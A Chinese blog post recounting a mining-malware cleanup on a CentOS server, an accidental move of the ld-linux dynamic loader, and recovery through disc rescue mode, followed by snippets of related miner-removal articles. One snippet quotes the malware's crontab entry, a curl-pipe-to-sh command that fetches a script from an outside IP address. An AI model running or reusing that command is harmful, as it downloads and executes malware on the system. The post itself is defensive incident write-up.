解决挖矿病毒占用cpu以及误删 ld-linux-x86-64.so.2 文件的问题

上次已经被抓去挖矿了当了一次旷工了,本以为解决了,没想到竟然死灰复燃。

这次占用cpu的依然是一个ld-linux的进程,kill掉之后同样就查了关于test用户的进程,果然,test用户的进程有100+个,比不上上次,还是用上次的脚本,将test的进程也kill掉。为防止恶意添加用户,将/etc/passwd 文件里的test用户删除后,给该文件添加了隐藏权限 i ,具体功能不知道的可以查下,此处不多介绍。再把主进程ld-linux干掉之后cpu直接降下来。

这已经是第二次了,为了防止还有第三次,决定彻底查找该挖矿病毒。于是 find 查找了关于 ld-linux 的文件,结果如下:

/tmp/.xm/stak/ld-linux-x86-64.so.2
/usr/lib64/ld-linux-x86-64.so.2 -> ld-2.17.so
/usr/share/man/man8/ld-linux.so.8.gz

/usr/share/man/man8/ld-linux.8.gz

可以看到第一条的记录:/tmp/.xm/stak/ld-linux-x86-64.so.2

是在tmp的一个隐藏目录下的文件里面,有个ld-linux-x86-64.so.2,并且这个文件和/usr/lib64/ld-linux-x86-64.so.2名字一模一样,为什么这么说,你应该知道linux恶意进程基本都是伪装成其他进程的,就是名字和一些文件的名字一样。如果不这样,你一看进程:“这是个啥进程,没见过,干掉!”,这样可能太对不起IT×××大佬写的代码了。

将/tmp/.xm/stak/ld-linux-x86-64.so.2 转移并取消权限(为了日后有时间研究下)。

接着搞第二条。由于才疏学浅,也没注意看/usr/lib64/ld-linux-x86-64.so.2 -> ld-2.17.so 是干啥的,就mv直接转移到了root的一个文件夹下,结果.............除了 cd 和pwd 命令之外的所有命令都不能用了,而且xshell连接也连接不上,一直显示拒绝连接。后来查了资料,这是一个什么动态库的文件,在系统里很是重要。现在仅有电脑上保持连接状态的三个xshell框,而且是啥也做不了。

百度、群里探讨、找解决方法。

试过ftp,试过scp.....想办法把ld-linux-x86-64.so.2还mv到原来的目录,或者从别的系统上复制过去。都没成功,预料的结果。

想到一起用的单用户模式修改root密码,就试试看能不能解决这个文件的问题。结果是能进去,但是文件不是互通的,就是里面的文件系统并不是原来系统里的东西,root下原本应该有的 ld-linux-x86-64.so.2 文件并不存在,也就没办法操作了。

后来查到救援模式的方法,centos7以前的系和centos7的救援模式是不一样的,具体的自己查。

此处有两个坑:

    1.这个ro,当时我找了好久,如果你也找不到的话可以试试在拐角处,一行的末尾是  r/ ,下一行的开头是 o ,明白了吧,

换行处有个/符号;

    2.这个系统的救援模式是不管用的,还是别试了;

好,下面开始说怎么拯救 ld-linx 。

系统的救援模式不管用,但是还有光盘的救援模式,准备一个刻录好的系统盘吧。

1.进入系统Bios设置,进光盘启动:

2.选择第三个Troubleshooting:

3.然后再选择第二个Rescue a CentOS Linux system,具体看选项,意思是“拯救一个centos系统”:

4.输入 1 ,然后回车即可;

###

这就是光盘的救援模式了,现在所用的命令都是这个系统盘的,基本都能用。

原来服务器的系统会被光盘挂载到 /mnt/sysimage/ 文件夹下,进去之后会发现,里面的文件和你之前系统的一样(其实就是)。

这样就可以操作了,去目录里把 ld-linux-x86-64.so.2 复制或者剪切到原来的目录吧,但是注意路径,(此处敲黑板3次),你原系统的根目录是/mnt/sysimage/!!!!!!(至少我的是,不确定的可以 df -h 看一下),操作的时候一定要看仔细,毕竟到这里可能是你最后的机会了,一个操作失误,可能就要刷系统了。

还有就是,这个光盘的救援模式,号称连系统内核都可以拯救(就是不知道 rm -rf /* 还能不能救回来),所以只要备份了数据,就总有解决的办法。

最后,发布的可能有些着急了,不全面的地方还望包涵,此文章仅供参考;

原文地址:http://blog.51cto.com/13577495/2156959

时间: 2024-09-26 20:57:40

解决挖矿病毒占用cpu以及误删 ld-linux-x86-64.so.2 文件的问题的相关文章

qW3xT.2,解决挖矿病毒。

首先杀死进程: 1.首先,将 CPU 占满的进程杀死 2.它有一个 守护进程 ps -aux|grep ddg 删除文件: 1.进入/tmp文件夹下.发现qW3xT.2文件,删除. 2.删除/tmp目录下的所有的对应ddg 删除计划任务: [[email protected] tmp]# crontab -l /15 * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh 删除计划任务 crontab -r 删除脚本: 发现计划任务在服务器中创

如何解决编译linux内核(解决声卡问题),遭遇fatal error: linux/limits.h: 没有那个文件或目录

最近帮一位上海的朋友搞一块小板,在ubuntu15.04 vivid上已经加载了对应了.ko驱动包 但关键是系统根本就枚举不到该声卡ALC5640,试了OpenSUSE也是一样的结果,看来是内核漏加载了什么模块. 所以准备重新编译Linux内核3.19.3,结果运行: make?menuconfig 得到错误提示: ? ? ? ? local_lim.h:38:26: fatal error: linux/limits.h ? 应该是在linux目录下找不到limits.h文件.有诸多兄弟碰到过

阿里云服务器被挖矿病毒minerd入侵的解决方法

早晨上班像往常一样对服务器进行例行巡检,发现一台阿里云服务器的CPU的资源占用很高,到底是怎么回事呢,赶紧用top命令查看了一下,发现是一个名为minerd的进程占用了很高的CPU资源,minerd之前听说过,是一种挖矿病毒,没有想到我负责的服务器会中这种病毒啊,赶紧的寻找解决的方法.下面是我把minerd给杀掉的过程,希望对大家有帮助. 步骤如下: 1.关闭访问挖矿服务器的访问 [[email protected]~]# iptables -A INPUT -s xmr.crypto-pool

挖矿病毒 解决思路 xmr

基本上通过服务器挖矿只能利用cpu的性能了,所以 top查看cpu利用率,但是程序会影藏,让你看不见,解决:删除/usr/local/lib/libntp.so ,后面ssh登录会出现错误提示,解决方法:编辑 .bashrc检查启动脚本 /etc/cron.d/root 有可能会新建文件夹并影藏,使用ls -a 查看.检查/tmp路径下文件,删除/tmp/kworkerds使用top查看pid,kill掉 后面需要注意redis的漏洞,bing 本机ip或者使用的ip ,最好使用其他用户启动re

Apache服务器httpd.exe进程占用cpu超过50%的解决方法

httpd.exe进程占用cpu超过50%,关闭掉Apache服务,cpu应用率立刻下降到0.  重新启动Apache又出现占用cpu高的情况.  原因是:httpd.exe和防火墙配置有冲突. 解决方法如下: 1.网上邻居->本地链接->属性->internet协议(TCP/IP)->属性->高级->wins标签->去掉起用LMhosts查询前的勾. 2.控制面版->windows防火墙->高级标签->本地链接设置->服务的标签里勾选安全

tomcat7+java压测过程中占用CPU过高排查故障和解决办法

环架构境: 前端haproxy做为反向代理,后端N+1台tomcat+java服务 出现问题: 环境是新搭建的,本周在做压测刚开始的时候正常,随着量的上涨,导致CPU一直暴涨. 解决办法和思路: 1.)先通过top命令查看占用cpu高的PID # 根据top命令查看发现PID为2195和975的的进程占用CPU高达%200+,明显出现故障 2.)通过top -H -p pid命令查看,发现2275 3302 3375这几个进程占用CPU时间8分钟 3.)把线程pid转换为16进制,例如:上面的p

SQL Server 占用CPU较高的解决方法

触发原因:月底系统结账的时候对ERP的操作较多,有用户反馈系统之间的数据传输很久没有同步.随即到服务器上查看,没有发现有程序导致的问题,看了一下CPU的使用率,发现SQL Server占用率在百分之九十以上. 解决过程:首先Baidu了一下,看了一下可能的原因应该是索引问题.之前有仔细看过SQL Server索引相关的书籍和查找优化索引的方法.所以立即使用SQL Server Profiler开始检测对CPU使用率高的SQL statement. 经过检测发现更新数据传输的语句占用CPU很高(u

php-cgi进程占用cpu资源过大原因分析及解决

一,开启日志记录,为以后排查做准备 1.1 开启php-fpm.conf的错误日志和慢执行日志和常规日志, 采样一个小时,就可以根据这些日志的内容进行分析问题error_log = /tmp/error.log //错误日志access.log = /tmp/access.$pool.log //常规日志,记录每次访问时间,记录不同参数,以防止恶意攻击,后面会详细解析access.format = "%R – %u %t \"%m %r%Q%q\" %s %f %{mili}

win10 解决 WMI Provider Host 占用CPU过高问题

真心懒得写Blog,但是之前遇到这个问题在网上查了一大圈,几乎一摸一样都是让关防火墙等服务的,然而对于我来说,并没有毛线用. 无奈,直接去微软社区查,还真有一篇问题解决方案.顺手翻译一下放在这里,希望能帮到大家. 参考链接:https://answers.microsoft.com/en-us/windows/forum/windows_10-other_settings/wmi-provider-host-high-cpu-usage-and-laptop/44cb3953-a883-404a